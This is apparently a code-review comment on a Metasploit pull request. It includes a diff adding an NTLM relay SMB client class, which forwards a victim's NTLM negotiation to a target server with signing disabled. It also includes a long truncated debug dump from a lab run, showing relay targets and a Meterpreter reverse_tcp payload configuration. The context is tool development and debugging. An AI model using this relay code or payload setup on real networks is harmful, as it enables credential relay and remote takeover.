lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb

```diff
@@ -0,0 +1,369 @@
+  end
+
+  # The SMB Client for interacting with the relayed_target
+  class SMBRelayTargetClient < ::RubySMB::Client
+    attr_reader :target
+
+    def initialize(dispatcher, username:, password:, domain: nil, local_workstation: nil, always_encrypt: nil, ntlm_flags: nil, provider: nil, target: nil)
+      super(dispatcher,
+            smb1: false,
+            smb2: true,
+            smb3: true,
+            username: username,
+            password: password,
+            domain: domain,
+            local_workstation: local_workstation,
+            always_encrypt: always_encrypt,
+            ntlm_flags: ntlm_flags)
+
+      @provider = provider
+      @target = target
+    end
+
+    def add_smb3_to_negotiate_request(packet, _dialects = [])
+      dialects = [
+        RubySMB::Client::SMB2_DIALECT_0202,
+        RubySMB::Client::SMB2_DIALECT_0210,
+        RubySMB::Client::SMB2_DIALECT_0300
+      ]
+
+      super(packet, dialects)
+    end
+
+    def get_peer_server_challenge(client_type1_msg)
+      @version = negotiate
+
+      if @version == 'SMB1'
+        # TODO: SMB1 not supported
+        # neg_pkt = smb1_ntlmssp_negotiate_packet
+        # neg_pkt.set_ntlm_type1_blob(victim_type1_msg.serialize)
+        # resp = send_recv(neg_pkt)
+        #
+        # challenge_packet = smb1_ntlmssp_challenge_packet(resp)
+        #
+        # # Store the available OS information before going forward.
+        # @peer_native_os = challenge_packet.data_block.native_os.to_s
+        # @peer_native_lm = challenge_packet.data_block.native_lan_man.to_s
+        #
+        # @user_id = challenge_packet.smb_header.uid
+        #
+        # type2_message_encoded = smb1_type2_message(challenge_packet)
+        #
+        # type2_challenge = Net::NTLM::Message.decode64(type2_message_encoded)
+        #
+        # type2_challenge.challenge
+      else
+        # Same as the ::RubySMB::Client::Authentication smb2_authenticate method, with two differences
+        #  - changes the type1_blob to match the blob of the type1 messages received from the client
+        #  - returns the challenge messages received from the server
+
+        server_type1_pkt = smb2_ntlmssp_negotiate_packet
+
+        server_type1_pkt.set_security_buffer(client_type1_msg)
+        # server_type1_pkt.buffer = client_type1_msg
+        server_type1_pkt.security_mode.signing_enabled = 0
+        server_type2_pkt_raw = send_recv(server_type1_pkt)
+        server_type2_pkt = smb2_ntlmssp_challenge_packet(server_type2_pkt_raw)
+
+        if @dialect == '0x0311'
+          update_preauth_hash(server_type2_pkt)
+        end
+
+        @session_id = server_type2_pkt.smb2_header.session_id
+        type2_ntlm_message = smb2_type2_message(server_type2_pkt)
+
+        Net::NTLM::Message.decode64(type2_ntlm_message)
+      end
+    rescue ::Exception => e
+      msg = "Unable to retrieve server challenge at #{display_target(target)}"
+      elog(msg, error: e)
+      logger.print_error msg
```

Comment:
Somewhere in this class I got an exception that `logger` wasn't defined. It looks like it was right here based on the message right before it.

<details>
<summary>Exception Info</summary>

framework.logs
```
[03/04/2022 14:36:23] [d(0)] core: Negotiated SMB version: SMB2
[03/04/2022 14:36:23] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[03/04/2022 14:36:23] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[03/04/2022 14:36:23] [d(0)] core: Negotiated SMB version: SMB2
[03/04/2022 14:36:43] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::ConnectionRefused The connection was refused by the remote host (192.168.159.128:445). - Rex::ConnectionRefused The connection was refused by the remote host (192.168.159.128:445).
[03/04/2022 14:37:03] [e(0)] core: Unable to create relay to smb://192.168.159.246:445 - Rex::HostUnreachable The host (192.168.159.246:445) was unreachable.
[03/04/2022 14:37:03] [e(0)] core: Unable to retrieve server challenge at smb://192.168.159.128:445 - RubySMB::Error::CommunicationError Socket read returned nil
[03/04/2022 14:37:03] [e(0)] core: NameError undefined local variable or method `logger' for #<Msf::Exploit::Remote::SMB::Relay::NTLM::SMBRelayTargetClient:0x000000000c7adb98 @dispatcher=#<RubySMB::Dispatcher::Socket:0x000000000c7add28 @tcp_socket=#<Socket:fd 20>, @read_timeout=30>, @pid=20686, @domain=nil, @local_workstation=nil, @password="", @sequence_counter=0, @session_id=0, @session_key="", @session_is_guest=false, @signing_required=false, @smb1=false, @smb2=false, @smb3=true, @username="", @max_buffer_size=64512, @server_max_buffer_size=8388608, @server_max_read_size=8388608, @server_max_write_size=8388608, @server_max_transact_size=8388608, @server_supports_multi_credit=false, @session_encrypt_data=false, @ntlm_client=#<Net::NTLM::Client:0x000000000c7ad918 @username="", @password="", @domain=nil, @workstation=nil, @flags=3758654007, @session=nil>, @tree_connects=[], @open_files={}, @smb2_message_id=2, @provider=#<Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient:0x000000000c615498 @server=#<Msf::Exploit::Remote::SMB::Relay::NTLM::Server:0x00007f46dca7e908 @guid="d\xBF\xE3\x17\xF6\xEC\x8F?6>Y\x96\xEA\\\e\xD3", @socket=#<Socket:fd 14>, @connections=[#<struct RubySMB::Server::Connection client=#<Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient:0x00007f46dcd7ebf8 @server=#<Msf::Exploit::Remote::SMB::Relay::NTLM::Server:0x00007f46dca7e908 ...>, @dispatcher=#<RubySMB::Dispatcher::Socket:0x00007f46dcd7ed10 @tcp_socket=#<Socket:(closed)>, @read_timeout=30>, @dialect=nil, @gss_authenticator=#<Msf::Exploit::Remote::SMB::Relay::Provider::AlwaysGrantAccessAuthenticator:0x00007f46dcd7eba8 @provider=#<Msf::Exploit::Remote::SMB::Relay::Provider::AlwaysGrantAccess:0x00007f46dcaabf20 @allow_anonymous=false, @default_domain="WORKGROUP", @accounts=[], @generate_server_challenge=#<Proc:0x00007f46dcaabea8 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/ruby_smb-3.0.5/lib/ruby_smb/gss/provider/ntlm.rb:253 (lambda)>, @netbios_domain="WORKGROUP", @dns_domain="WORKGROUP", @netbios_hostname="WORKGROUP", @dns_hostname="WORKGROUP">, @server_client=#<Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient:0x00007f46dcd7ebf8 ...>, @session_key=nil, @server_challenge="g\"\xDE(\x87\xD4\x80%">, @preauth_integrity_hash_algorithm=nil, @preauth_integrity_hash_value=nil, @in_packet_queue=[], @session_table={1841138348=>#<Session id: 1841138348, user_id: nil, state: :in_progress>, 369923394=>#<Session id: 369923394, user_id: "MSFLAB\\smcintyre", state: :in_progress>}, @timeout=25, @relay_targets=#<Msf::Exploit::Remote::SMB::Relay::TargetList:0x00007f46dca98d80 @mon_data=#<Monitor:0x00007f46dca98d30>, @mon_data_owner_object_id=111980, @targets=[#<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8caf8 @ip="192.168.159.246", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>:failed, :relay_attempted_at=>2022-03-04 14:37:00.654372967 -0500, :relayed_at=>nil, :relay_attempts=>1}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c058 @ip="192.168.159.128", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>:attempting, :relay_attempted_at=>2022-03-04 14:37:03.774595135 -0500, :relayed_at=>nil, :relay_attempts=>1}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c300 @ip="192.168.159.86", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c850 @ip="192.168.159.11", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8cdc8 @ip="192.168.159.22", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c5a8 @ip="192.168.159.87", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>]>, @relay_timeout=25, @listener=#<Module:exploit/windows/smb/smb_relay datastore=[{"EXITFUNC"=>"thread", "WORKSPACE"=>nil, "VERBOSE"=>true, "EnableContextEncoding"=>false, "ContextInformationFile"=>nil, "DisablePayloadHandler"=>false, "SRVHOST"=>"0.0.0.0", "SRVPORT"=>445, "ListenerComm"=>nil, "SSL"=>false, "SSLVersion"=>"Auto", "SSLVerifyMode"=>"PEER", "SSLCipher"=>nil, "Proxies"=>nil, "CPORT"=>nil, "CHOST"=>nil, "ConnectTimeout"=>10, "TCP::max_send_size"=>0, "TCP::send_delay"=>0, "DCERPC::max_frag_size"=>4096, "DCERPC::fake_bind_multi"=>true, "DCERPC::fake_bind_multi_prepend"=>0, "DCERPC::fake_bind_multi_append"=>0, "DCERPC::smb_pipeio"=>"rw", "DCERPC::ReadTimeout"=>10, "NTLM::UseNTLMv2"=>true, "NTLM::UseNTLM2_session"=>true, "NTLM::SendLM"=>true, "NTLM::UseLMKey"=>false, "NTLM::SendNTLM"=>true, "NTLM::SendSPN"=>true, "SMB::pipe_evasion"=>false, "SMB::pipe_write_min_size"=>1, "SMB::pipe_write_max_size"=>1024, "SMB::pipe_read_min_size"=>1, "SMB::pipe_read_max_size"=>1024, "SMB::pad_data_level"=>0, "SMB::pad_file_level"=>0, "SMB::obscure_trans_pipe_level"=>0, "SMBDirect"=>true, "SMBDomain"=>"WORKGROUP", "SMBName"=>"*SMBSERVER", "SMB::VerifySignature"=>false, "SMB::ChunkSize"=>500, "SMB::Native_OS"=>"Windows 2000 2195", "SMB::Native_LM"=>"Windows 2000 5.0", "SMB::ProtocolVersion"=>"1,2,3", "SMB::AlwaysEncrypt"=>true, "SERVICE_NAME"=>nil, "SERVICE_DISPLAY_NAME"=>nil, "SERVICE_DESCRIPTION"=>nil, "SERVICE_PERSIST"=>false, "CMD::DELAY"=>3, "Powershell::persist"=>false, "Powershell::prepend_sleep"=>nil, "Powershell::prepend_protections_bypass"=>"auto", "Powershell::strip_comments"=>true, "Powershell::strip_whitespace"=>false, "Powershell::sub_vars"=>true, "Powershell::sub_funcs"=>false, "Powershell::exec_in_place"=>false, "Powershell::exec_rc4"=>false, "Powershell::remove_comspec"=>false, "Powershell::noninteractive"=>true, "Powershell::encode_final_payload"=>false, "Powershell::encode_inner_payload"=>false, "Powershell::wrap_double_quotes"=>true, "Powershell::no_equals"=>false, "Powershell::method"=>"reflection", "EXE::EICAR"=>false, "EXE::Custom"=>nil, "EXE::Path"=>nil, "EXE::Template"=>nil, "EXE::Inject"=>false, "EXE::OldMethod"=>false, "EXE::FallBack"=>false, "MSI::EICAR"=>false, "MSI::Custom"=>nil, "MSI::Path"=>nil, "MSI::Template"=>nil, "MSI::UAC"=>false, "SMBSHARE"=>"", "RELAY_TARGETS"=>"192.168.159.22 192.168.159.246 192.168.159.11 192.168.159.87 192.168.159.86 192.168.159.128", "CAINPWFILE"=>nil, "JOHNPWFILE"=>nil, "SRV_TIMEOUT"=>25, "RELAY_TIMEOUT"=>25, "RANDOMIZE_TARGETS"=>true, "SERVICE_FILENAME"=>nil, "PSH_PATH"=>"Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "SERVICE_STUB_ENCODER"=>nil, "PAYLOAD"=>"windows/meterpreter/reverse_tcp", "LHOST"=>"192.168.159.128", "LPORT"=>4444, "ReverseAllowProxy"=>false, "ReverseListenerThreaded"=>false, "StagerRetryCount"=>10, "StagerRetryWait"=>5, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncodingFallback"=>true, "PrependMigrate"=>false, "AutoLoadStdapi"=>true, "AutoVerifySessionTimeout"=>30, "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "AutoUnhookProcess"=>false, "ReverseListenerBindPort"=>nil, "ReverseListenerComm"=>nil, "ReverseListenerBindAddress"=>nil, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "PrependMigrateProc"=>nil, "PayloadBindPort"=>nil, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "HandlerSSLCert"=>nil, "PayloadProcessCommandLine"=>"", "TARGET"=>0}]>>, thread=#<Thread:0x00007f46dcd7e5e0 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 dead>>, #<struct RubySMB::Server::Connection client=#<Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient:0x000000000c615498 ...>, thread=#<Thread:0x000000000c614ea8 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 run>>, #<struct RubySMB::Server::Connection client=#<Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient:0x000000000c7961f0 @server=#<Msf::Exploit::Remote::SMB::Relay::NTLM::Server:0x00007f46dca7e908 ...>, @dispatcher=#<RubySMB::Dispatcher::Socket:0x000000000c7962e0 @tcp_socket=#<Socket:(closed)>, @read_timeout=30>, @dialect=nil, @gss_authenticator=#<Msf::Exploit::Remote::SMB::Relay::Provider::AlwaysGrantAccessAuthenticator:0x000000000c7961a0 @provider=#<Msf::Exploit::Remote::SMB::Relay::Provider::AlwaysGrantAccess:0x00007f46dcaabf20 @allow_anonymous=false, @default_domain="WORKGROUP", @accounts=[], @generate_server_challenge=#<Proc:0x00007f46dcaabea8 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/ruby_smb-3.0.5/lib/ruby_smb/gss/provider/ntlm.rb:253 (lambda)>, @netbios_domain="WORKGROUP", @dns_domain="WORKGROUP", @netbios_hostname="WORKGROUP", @dns_hostname="WORKGROUP">, @server_client=#<Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient:0x000000000c7961f0 ...>, @session_key=nil, @server_challenge=nil>, @preauth_integrity_hash_algorithm=nil, @preauth_integrity_hash_value=nil, @in_packet_queue=[], @session_table={503043844=>#<Session id: 503043844, user_id: nil, state: :in_progress>, 3868504353=>#<Session id: 3868504353, user_id: nil, state: :in_progress>}, @timeout=25, @relay_targets=#<Msf::Exploit::Remote::SMB::Relay::TargetList:0x00007f46dca98d80 @mon_data=#<Monitor:0x00007f46dca98d30>, @mon_data_owner_object_id=111980, @targets=[#<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8caf8 @ip="192.168.159.246", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>:failed, :relay_attempted_at=>2022-03-04 14:37:00.654372967 -0500, :relayed_at=>nil, :relay_attempts=>1}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c058 @ip="192.168.159.128", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>:attempting, :relay_attempted_at=>2022-03-04 14:37:03.774595135 -0500, :relayed_at=>nil, :relay_attempts=>1}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c300 @ip="192.168.159.86", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c850 @ip="192.168.159.11", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8cdc8 @ip="192.168.159.22", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c5a8 @ip="192.168.159.87", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>]>, @relay_timeout=25, @listener=#<Module:exploit/windows/smb/smb_relay datastore=[{"EXITFUNC"=>"thread", "WORKSPACE"=>nil, "VERBOSE"=>true, "EnableContextEncoding"=>false, "ContextInformationFile"=>nil, "DisablePayloadHandler"=>false, "SRVHOST"=>"0.0.0.0", "SRVPORT"=>445, "ListenerComm"=>nil, "SSL"=>false, "SSLVersion"=>"Auto", "SSLVerifyMode"=>"PEER", "SSLCipher"=>nil, "Proxies"=>nil, "CPORT"=>nil, "CHOST"=>nil, "ConnectTimeout"=>10, "TCP::max_send_size"=>0, "TCP::send_delay"=>0, "DCERPC::max_frag_size"=>4096, "DCERPC::fake_bind_multi"=>true, "DCERPC::fake_bind_multi_prepend"=>0, "DCERPC::fake_bind_multi_append"=>0, "DCERPC::smb_pipeio"=>"rw", "DCERPC::ReadTimeout"=>10, "NTLM::UseNTLMv2"=>true, "NTLM::UseNTLM2_session"=>true, "NTLM::SendLM"=>true, "NTLM::UseLMKey"=>false, "NTLM::SendNTLM"=>true, "NTLM::SendSPN"=>true, "SMB::pipe_evasion"=>false, "SMB::pipe_write_min_size"=>1, "SMB::pipe_write_max_size"=>1024, "SMB::pipe_read_min_size"=>1, "SMB::pipe_read_max_size"=>1024, "SMB::pad_data_level"=>0, "SMB::pad_file_level"=>0, "SMB::obscure_trans_pipe_level"=>0, "SMBDirect"=>true, "SMBDomain"=>"WORKGROUP", "SMBName"=>"*SMBSERVER", "SMB::VerifySignature"=>false, "SMB::ChunkSize"=>500, "SMB::Native_OS"=>"Windows 2000 2195", "SMB::Native_LM"=>"Windows 2000 5.0", "SMB::ProtocolVersion"=>"1,2,3", "SMB::AlwaysEncrypt"=>true, "SERVICE_NAME"=>nil, "SERVICE_DISPLAY_NAME"=>nil, "SERVICE_DESCRIPTION"=>nil, "SERVICE_PERSIST"=>false, "CMD::DELAY"=>3, "Powershell::persist"=>false, "Powershell::prepend_sleep"=>nil, "Powershell::prepend_protections_bypass"=>"auto", "Powershell::strip_comments"=>true, "Powershell::strip_whitespace"=>false, "Powershell::sub_vars"=>true, "Powershell::sub_funcs"=>false, "Powershell::exec_in_place"=>false, "Powershell::exec_rc4"=>false, "Powershell::remove_comspec"=>false, "Powershell::noninteractive"=>true, "Powershell::encode_final_payload"=>false, "Powershell::encode_inner_payload"=>false, "Powershell::wrap_double_quotes"=>true, "Powershell::no_equals"=>false, "Powershell::method"=>"reflection", "EXE::EICAR"=>false, "EXE::Custom"=>nil, "EXE::Path"=>nil, "EXE::Template"=>nil, "EXE::Inject"=>false, "EXE::OldMethod"=>false, "EXE::FallBack"=>false, "MSI::EICAR"=>false, "MSI::Custom"=>nil, "MSI::Path"=>nil, "MSI::Template"=>nil, "MSI::UAC"=>false, "SMBSHARE"=>"", "RELAY_TARGETS"=>"192.168.159.22 192.168.159.246 192.168.159.11 192.168.159.87 192.168.159.86 192.168.159.128", "CAINPWFILE"=>nil, "JOHNPWFILE"=>nil, "SRV_TIMEOUT"=>25, "RELAY_TIMEOUT"=>25, "RANDOMIZE_TARGETS"=>true, "SERVICE_FILENAME"=>nil, "PSH_PATH"=>"Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "SERVICE_STUB_ENCODER"=>nil, "PAYLOAD"=>"windows/meterpreter/reverse_tcp", "LHOST"=>"192.168.159.128", "LPORT"=>4444, "ReverseAllowProxy"=>false, "ReverseListenerThreaded"=>false, "StagerRetryCount"=>10, "StagerRetryWait"=>5, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncodingFallback"=>true, "PrependMigrate"=>false, "AutoLoadStdapi"=>true, "AutoVerifySessionTimeout"=>30, "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "AutoUnhookProcess"=>false, "ReverseListenerBindPort"=>nil, "ReverseListenerComm"=>nil, "ReverseListenerBindAddress"=>nil, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "PrependMigrateProc"=>nil, "PayloadBindPort"=>nil, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "HandlerSSLCert"=>nil, "PayloadProcessCommandLine"=>"", "TARGET"=>0}]>>, thread=#<Thread:0x000000000c795c00 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 dead>>], @gss_provider=#<Msf::Exploit::Remote::SMB::Relay::Provider::AlwaysGrantAccess:0x00007f46dcaabf20 @allow_anonymous=false, @default_domain="WORKGROUP", @accounts=[], @generate_server_challenge=#<Proc:0x00007f46dcaabea8 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/ruby_smb-3.0.5/lib/ruby_smb/gss/provider/ntlm.rb:253 (lambda)>, @netbios_domain="WORKGROUP", @dns_domain="WORKGROUP", @netbios_hostname="WORKGROUP", @dns_hostname="WORKGROUP">, @dialects=["0x0311", "0x0302", "0x0300", "0x0210", "0x0202", "NT LM 0.12"], @logger=#<Msf::Modules::Exploit__Windows__Smb__Smb_relay::MetasploitModule::RubySmbAdapter::Logging::Logger:0x00007f46dca99190 @level=0, @progname=nil, @default_formatter=#<Logger::Formatter:0x00007f46dca990f0 @datetime_format=nil>, @formatter=nil, @logdev=#<Logger::LogDevice:0x00007f46dca99050 @shift_period_suffix=nil, @shift_size=nil, @shift_age=nil, @filename=nil, @dev=#<Msf::Modules::Exploit__Windows__Smb__Smb_relay::MetasploitModule::RubySmbAdapter::Logging::LogDevice::Module:0x00007f46dca991e0 @mod=#<Module:exploit/windows/smb/smb_relay datastore=[{"EXITFUNC"=>"thread", "WORKSPACE"=>nil, "VERBOSE"=>true, "EnableContextEncoding"=>false, "ContextInformationFile"=>nil, "DisablePayloadHandler"=>false, "SRVHOST"=>"0.0.0.0", "SRVPORT"=>445, "ListenerComm"=>nil, "SSL"=>false, "SSLVersion"=>"Auto", "SSLVerifyMode"=>"PEER", "SSLCipher"=>nil, "Proxies"=>nil, "CPORT"=>nil, "CHOST"=>nil, "ConnectTimeout"=>10, "TCP::max_send_size"=>0, "TCP::send_delay"=>0, "DCERPC::max_frag_size"=>4096, "DCERPC::fake_bind_multi"=>true, "DCERPC::fake_bind_multi_prepend"=>0, "DCERPC::fake_bind_multi_append"=>0, "DCERPC::smb_pipeio"=>"rw", "DCERPC::ReadTimeout"=>10, "NTLM::UseNTLMv2"=>true, "NTLM::UseNTLM2_session"=>true, "NTLM::SendLM"=>true, "NTLM::UseLMKey"=>false, "NTLM::SendNTLM"=>true, "NTLM::SendSPN"=>true, "SMB::pipe_evasion"=>false, "SMB::pipe_write_min_size"=>1, "SMB::pipe_write_max_size"=>1024, "SMB::pipe_read_min_size"=>1, "SMB::pipe_read_max_size"=>1024, "SMB::pad_data_level"=>0, "SMB::pad_file_level"=>0, "SMB::obscure_trans_pipe_level"=>0, "SMBDirect"=>true, "SMBDomain"=>"WORKGROUP", "SMBName"=>"*SMBSERVER", "SMB::VerifySignature"=>false, "SMB::ChunkSize"=>500, "SMB::Native_OS"=>"Windows 2000 2195", "SMB::Native_LM"=>"Windows 2000 5.0", "SMB::ProtocolVersion"=>"1,2,3", "SMB::AlwaysEncrypt"=>true, "SERVICE_NAME"=>nil, "SERVICE_DISPLAY_NAME"=>nil, "SERVICE_DESCRIPTION"=>nil, "SERVICE_PERSIST"=>false, "CMD::DELAY"=>3, "Powershell::persist"=>false, "Powershell::prepend_sleep"=>nil, "Powershell::prepend_protections_bypass"=>"auto", "Powershell::strip_comments"=>true, "Powershell::strip_whitespace"=>false, "Powershell::sub_vars"=>true, "Powershell::sub_funcs"=>false, "Powershell::exec_in_place"=>false, "Powershell::exec_rc4"=>false, "Powershell::remove_comspec"=>false, "Powershell::noninteractive"=>true, "Powershell::encode_final_payload"=>false, "Powershell::encode_inner_payload"=>false, "Powershell::wrap_double_quotes"=>true, "Powershell::no_equals"=>false, "Powershell::method"=>"reflection", "EXE::EICAR"=>false, "EXE::Custom"=>nil, "EXE::Path"=>nil, "EXE::Template"=>nil, "EXE::Inject"=>false, "EXE::OldMethod"=>false, "EXE::FallBack"=>false, "MSI::EICAR"=>false, "MSI::Custom"=>nil, "MSI::Path"=>nil, "MSI::Template"=>nil, "MSI::UAC"=>false, "SMBSHARE"=>"", "RELAY_TARGETS"=>"192.168.159.22 192.168.159.246 192.168.159.11 192.168.159.87 192.168.159.86 192.168.159.128", "CAINPWFILE"=>nil, "JOHNPWFILE"=>nil, "SRV_TIMEOUT"=>25, "RELAY_TIMEOUT"=>25, "RANDOMIZE_TARGETS"=>true, "SERVICE_FILENAME"=>nil, "PSH_PATH"=>"Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "SERVICE_STUB_ENCODER"=>nil, "PAYLOAD"=>"windows/meterpreter/reverse_tcp", "LHOST"=>"192.168.159.128", "LPORT"=>4444, "ReverseAllowProxy"=>false, "ReverseListenerThreaded"=>false, "StagerRetryCount"=>10, "StagerRetryWait"=>5, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncodingFallback"=>true, "PrependMigrate"=>false, "AutoLoadStdapi"=>true, "AutoVerifySessionTimeout"=>30, "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "AutoUnhookProcess"=>false, "ReverseListenerBindPort"=>nil, "ReverseListenerComm"=>nil, "ReverseListenerBindAddress"=>nil, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "PrependMigrateProc"=>nil, "PayloadBindPort"=>nil, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "HandlerSSLCert"=>nil, "PayloadProcessCommandLine"=>"", "TARGET"=>0}]>>, @binmode=false, @mon_data=#<Monitor:0x00007f46dca99000>, @mon_data_owner_object_id=111960>, @mod=#<Module:exploit/windows/smb/smb_relay datastore=[{"EXITFUNC"=>"thread", "WORKSPACE"=>nil, "VERBOSE"=>true, "EnableContextEncoding"=>false, "ContextInformationFile"=>nil, "DisablePayloadHandler"=>false, "SRVHOST"=>"0.0.0.0", "SRVPORT"=>445, "ListenerComm"=>nil, "SSL"=>false, "SSLVersion"=>"Auto", "SSLVerifyMode"=>"PEER", "SSLCipher"=>nil, "Proxies"=>nil, "CPORT"=>nil, "CHOST"=>nil, "ConnectTimeout"=>10, "TCP::max_send_size"=>0, "TCP::send_delay"=>0, "DCERPC::max_frag_size"=>4096, "DCERPC::fake_bind_multi"=>true, "DCERPC::fake_bind_multi_prepend"=>0, "DCERPC::fake_bind_multi_append"=>0, "DCERPC::smb_pipeio"=>"rw", "DCERPC::ReadTimeout"=>10, "NTLM::UseNTLMv2"=>true, "NTLM::UseNTLM2_session"=>true, "NTLM::SendLM"=>true, "NTLM::UseLMKey"=>false, "NTLM::SendNTLM"=>true, "NTLM::SendSPN"=>true, "SMB::pipe_evasion"=>false, "SMB::pipe_write_min_size"=>1, "SMB::pipe_write_max_size"=>1024, "SMB::pipe_read_min_size"=>1, "SMB::pipe_read_max_size"=>1024, "SMB::pad_data_level"=>0, "SMB::pad_file_level"=>0, "SMB::obscure_trans_pipe_level"=>0, "SMBDirect"=>true, "SMBDomain"=>"WORKGROUP", "SMBName"=>"*SMBSERVER", "SMB::VerifySignature"=>false, "SMB::ChunkSize"=>500, "SMB::Native_OS"=>"Windows 2000 2195", "SMB::Native_LM"=>"Windows 2000 5.0", "SMB::ProtocolVersion"=>"1,2,3", "SMB::AlwaysEncrypt"=>true, "SERVICE_NAME"=>nil, "SERVICE_DISPLAY_NAME"=>nil, "SERVICE_DESCRIPTION"=>nil, "SERVICE_PERSIST"=>false, "CMD::DELAY"=>3, "Powershell::persist"=>false, "Powershell::prepend_sleep"=>nil, "Powershell::prepend_protections_bypass"=>"auto", "Powershell::strip_comments"=>true, "Powershell::strip_whitespace"=>false, "Powershell::sub_vars"=>true, "Powershell::sub_funcs"=>false, "Powershell::exec_in_place"=>false, "Powershell::exec_rc4"=>false, "Powershell::remove_comspec"=>false, "Powershell::noninteractive"=>true, "Powershell::encode_final_payload"=>false, "Powershell::encode_inner_payload"=>false, "Powershell::wrap_double_quotes"=>true, "Powershell::no_equals"=>false, "Powershell::method"=>"reflection", "EXE::EICAR"=>false, "EXE::Custom"=>nil, "EXE::Path"=>nil, "EXE::Template"=>nil, "EXE::Inject"=>false, "EXE::OldMethod"=>false, "EXE::FallBack"=>false, "MSI::EICAR"=>false, "MSI::Custom"=>nil, "MSI::Path"=>nil, "MSI::Template"=>nil, 